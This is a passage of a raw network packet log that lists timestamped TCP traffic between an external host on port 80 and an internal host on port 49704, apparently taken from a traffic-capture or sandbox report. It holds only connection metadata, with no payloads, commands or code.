Jul 26, 2024 17:56:12.913316965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913322926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913369894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.914098024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914109945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914118052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914129019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914139986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914150953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914158106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.914161921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914174080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914206028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.914227962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.914367914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914378881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914405107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.914419889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.914469957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914482117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914493084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914503098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914509058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.914515972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914526939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914535999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.914536953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.914567947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.915422916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.915433884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.915443897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.915456057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.915466070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.915467024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.915478945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.915488958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.915502071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.915507078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.915519953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.915554047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.916352034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.916363001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.916373968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.916384935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.916395903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.916402102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.916405916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.916416883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.916425943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.916428089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.916438103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.916445017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.916462898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.916495085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.917474031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.917494059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.917505980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.917517900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.917530060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.917535067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.917541981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.917552948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.917562008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.917565107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.917579889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.917601109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.977021933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.977078915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.977112055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.977111101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.977139950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.977154970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.977215052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.977271080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.977310896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.977344990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.977361917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.977379084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.977408886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.977423906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.981224060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.981300116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.981307030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.981340885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.981369972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.981389046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.981573105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.981605053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.981622934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.981656075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.981662989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.981722116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.984560013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.984594107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.984627962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.984628916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.984656096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.984678030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.984711885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.984761953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.984766006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.984795094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.984810114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.984828949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.984844923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.984880924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985253096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985286951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985312939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985320091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985348940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985353947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985368013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985388041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985399961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985421896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985440016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985454082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985471010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985503912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985738993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985794067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985897064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985934019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.985960007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.985969067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.986010075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.986031055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.986270905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.986303091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.986327887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.986336946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.986352921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.986370087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.986387014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.986402988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.986418962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.986438990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.986454964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.986474037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.986490965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.986521959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.986963987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.987014055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.987019062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.987046957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.987066031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.987081051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.987097025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.987114906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.987140894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.987149000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.987165928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.987181902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.987198114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.987215996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.987231970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.987250090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.987265110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.987299919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.006863117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.006917953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.006917000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.006951094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.006964922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.006998062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007155895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007189035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007201910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007222891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007239103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007255077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007267952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007298946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007564068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007611036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007613897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007647038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007656097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007679939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007684946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007713079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007721901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007745981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007752895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007778883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007787943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007811069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.007895947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.007895947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.008559942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.008594990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.008608103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.008625984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.008636951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.008658886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.008668900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.008692026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.008702993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.008724928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.008733988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.008758068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.008768082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.008790970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.008799076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.008822918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.008831024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.008866072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.009427071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.009459972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.009474993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.009491920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.009501934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.009526014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.009535074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.009557962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.009563923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.009591103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.009598017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.009623051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.009629011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.009655952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.009663105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.009687901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.009695053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.009728909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.010345936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.010380030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.010406017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.010415077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.010422945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.010448933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.010458946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.010481119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.010492086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.010515928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.010524988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.010548115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.010555983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.010581017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.010588884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.010615110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.010621071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.010658026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.011235952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.011269093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.011282921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.011301041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.011311054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.011333942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.011342049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.011367083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.011374950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.011399031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.011405945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.011430979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.011440039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.011464119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.011471033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.011497974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.011503935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.011538982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012396097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012429953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012451887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012458086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012471914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012497902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012526035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012559891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012567043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012593985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012605906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012628078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012635946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012660980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012669086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012695074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012702942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012732983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.012736082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.012821913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.067552090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.067610979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.067630053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.067646980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.067661047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.067692041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.067760944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.067795038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.067809105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.067830086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.067841053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.067876101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.068090916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.068125010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.068141937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.068160057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.068171024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.068192959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.068212032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.068227053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.068238974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.068260908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.068275928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.068308115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.068557024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.068591118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.068609953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.068635941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.108398914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.108445883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.108545065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.108546019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.108546972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.108608007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.108648062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.108684063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.108695984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.108719110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.108731985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.108753920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.108767033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.108814955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.109605074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109641075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109658957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.109673977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109693050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.109708071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109723091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.109743118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109756947 CEST	49704	80	192.168.2.5	85.28.47.31
